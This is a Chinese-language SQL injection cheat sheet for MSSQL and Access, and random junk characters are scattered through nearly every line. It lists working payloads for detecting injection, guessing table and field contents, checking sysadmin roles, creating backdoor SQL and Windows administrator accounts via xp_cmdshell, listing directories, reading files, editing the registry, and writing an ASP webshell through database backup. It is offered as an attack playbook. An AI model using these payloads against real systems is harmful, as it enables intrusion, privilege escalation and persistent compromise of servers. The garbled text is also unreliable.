1.判断是否有注入;and 1=1 ;and 1=2 Fa;CWyt
2.初步判断是否是mssql ;and user>0 pIh@!C
F6fm{
3.注入参数是字符'and [查询条件] and ''=' F'Wef11Yz
{}.c.W+
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Z{e5 OJ
'SuYNA)
5.判断数据库系统 1sgoT f%
&)wQ|{P~k
;and (select count(*) from sysobjects)>0 mssql f+)F-3
;z&p(e
;and (select count(*) from msysobjects)>0 access l
lQ<x
jx-W$@
K%Rx5 S
' rXkTm1{
6.猜数据库 ;and (select Count(*) from [数据库名])>0 r^]0LJ
h5Z%|J>;0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ;ymUMQ%;/
h'N,oDB)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 k6dSj>F>
}+u<^7$g|
9.(1)猜字段的ascii值(access) j|
257D
Lrz>00(*4
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 DTJ~.
wD*_S}]
(2)猜字段的ascii值(mssql) =!p6}5Z
YWm:#{n.
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Ble <n6
h883pe=
10.测试权限结构(mssql) Qx
{/izc
e#08,wgW
yy%J{;
NjMo"1d
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 7^:s/xHO*
or(Z-8a_
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- PI }A')Nq.
^D\#*pIO
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ~(FyGB}
fa$ Fo(.
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- &ts!D!Hj
'!Q[+@$
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5<&<61[A
8pPAEf
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- qG~O]($
c1Dhx,]ad
;and 1=(select IS_MEMBER('db_owner'));-- 1z*] MYU
3{
`fT5]U
u0N1+-6kr+
6n<:ph,h;
11.添加mssql和系统的帐户 zaX30e:R
>\MV/!W
;exec master.dbo.sp_addlogin username;-- ;o#dmG
;exec master.dbo.sp_password null,username,password;-- .O~)zMx
(3W<yAM+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- [ UQzCqV
*-gS u
;exec master.dbo.xp_cmdshell 'net user username password +
_4.fT
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- j#o0y5S
qA&N6`
;exec master.dbo.xp_cmdshell 'net user username password /add';-- fNQ.FAK":
FJ~Dg3F1
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- xpUaFb
-<qci3Ba}
, Lhgv1
wS8qua
12.(1)遍历目录 nIXq2TzJ
RaG-9gujI
;create table dirs(paths varchar(100), id int) +xB!T1pD
3_ObCsJ#,
;insert dirs exec master.dbo.xp_dirtree 'c:\' lO)p
t[7YMk
;and (select top 1 paths from dirs)>0 O[Nc$dc
wB"&K;t
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 4km=KOx[
~^:/t<N
F@&q4whaVD
OyFBM>6gh
(2)遍历目录 ^-mz!{
=|=9\3po
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- X8F _Mb*
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 `[7&tOvSk
X,^J3Ek>O
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 i3N _wv{
qH$G_R#)8B
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
EcFYP"{U
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 J*qepq`_
HIeWgw^"
}kGJ)zh
miEfxim
13.mssql中的存储过程 =]&R6P>
J7_'@zU
xp_regenumvalues 注册表根键, 子键 A'p"FYlCW
Peh(*D{
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ~cQP4
kBD]
?}lgwKBHl;
xp_regread 根键,子键,键值名 qFt%{~a
S
}yC ve
;exec xp_regread n SmYa7
tk2B\}6
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
d8/lEmv[
xp_regwrite 根键,子键, 值名, 值类型, 值 SO3WOR`3
hPP+lqY[
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 8&f}GdZh
+u:8#!X$RD
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 'l)@MXbGL
I
Yj\t?,0
xp_regdeletevalue 根键,子键,值名 FK;\Nce&
x]J{EA{+
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 XBdC/DM[
'&'?
S
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;F"W6G
'P39^rb
tbl!{Qwx
6t<~. 2'
14.mssql的backup创建webshell Ilsh
Jo
`yNNpSdS1
use model )d_)CuUBe
]Y}faW(&Y
create table cmd(str image); I?Hj,lN
(SU*fD!t
insert into cmd(str) values ('');
YNH>^cD1
t-3wjS1v
backup database model to disk='c:\l.asp'; ?9
m3y0
Y+F$]!hw
GL9R
5
C5*j0}
15.mssql内置函数 P2!@^%o
wwmMpK}f
;and (select @@version)>0 获得Windows的版本号 LPvyfD;Zy
*.~hn5Y|?
;and user_name()='dbo' 判断当前系统的连接用户是不是sa )j]S;Mr
Lb{~a_c
;and (select user_name())>0 爆当前系统的连接用户 m{I_E
G
6^s]2mMfk
;and (select db_name())>0 得到当前连接的数据库 Z#3wMK~
8pg?g'A~}
Zj[Bm\8
)|q,RAn
16.简洁的webshell RHz'Dz>0
VsNqYFHes&
use model ?so3Kj6H
T<mk98CdE
create table cmd(str image); '[{M"S
4ehajK
insert into cmd(str) values (''); &:nWZ!D
mAX]m 1s
backup database model to disk='g:\wwwtest\l.asp';